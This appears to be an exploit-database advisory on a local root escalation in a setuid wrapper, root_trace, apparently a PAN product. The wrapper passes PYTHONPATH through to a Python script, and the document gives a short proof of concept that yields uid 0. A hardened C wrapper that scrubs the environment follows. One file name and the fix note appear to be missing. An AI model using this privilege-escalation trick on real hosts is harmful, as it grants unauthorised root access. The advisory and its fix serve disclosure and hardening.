Source:

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a Python script:

$ ls -l /usr/local/bin/root_trace
-rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace

As the environment is not scrubbed, you can just do something like this:

$ cat /tmp/
import os
os.system("id")
os._exit(0);

$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

This was fixed by PAN:

# Iranian Exploit DataBase = http://IeDb.Ir [2016-11-21]
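
A hardened form of the wrapper described above, as an added example (not PAN's fix and not code from the original advisory): it builds a minimal environment from an allowlist and replaces system() with execve() and an explicit envp, so PYTHONPATH and similar variables never reach the interpreter. The allowlist (TERM, TZ), the fixed PATH value and the function names are assumptions made for illustration.

```c
/* Added example: allowlist-based environment scrubbing for a setuid wrapper. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MAX_ENV 8

/* Assumed allowlist: only these are copied from the caller.
 * Everything else (PYTHONPATH, LD_*, IFS, ...) is dropped. */
static const char *const ALLOWED[] = { "TERM", "TZ", NULL };

/* Return 1 if entry is "NAME=value" for an allowlisted NAME, else 0. */
int env_is_allowed(const char *entry)
{
    for (size_t i = 0; ALLOWED[i] != NULL; i++) {
        size_t n = strlen(ALLOWED[i]);
        if (strncmp(entry, ALLOWED[i], n) == 0 && entry[n] == '=')
            return 1;
    }
    return 0;
}

/* Build a minimal envp in out[] (capacity cap, including the NULL
 * terminator); returns the number of entries written. */
size_t scrub_env(char *const in[], const char *out[], size_t cap)
{
    size_t n = 0;
    if (cap < 2) { if (cap) out[0] = NULL; return 0; }
    out[n++] = "PATH=/usr/sbin:/usr/bin:/sbin:/bin"; /* fixed, never inherited */
    for (size_t i = 0; in != NULL && in[i] != NULL && n + 1 < cap; i++)
        if (env_is_allowed(in[i]))
            out[n++] = in[i];
    out[n] = NULL;
    return n;
}

int main(void)
{
    extern char **environ;
    const char *clean[MAX_ENV];
    char *const argv[] = { "masterd", NULL };

    scrub_env(environ, clean, MAX_ENV);
    if (setuid(0) != 0) { perror("setuid"); return 1; }
    /* execve() with an explicit envp: no shell, no inherited variables. */
    execve("/usr/local/bin/masterd", argv, (char *const *)clean);
    perror("execve");
    return 1;
}
```

An allowlist is used rather than a denylist of known-dangerous names because interpreters and the dynamic loader honour many variables, and a denylist has to be complete to be safe.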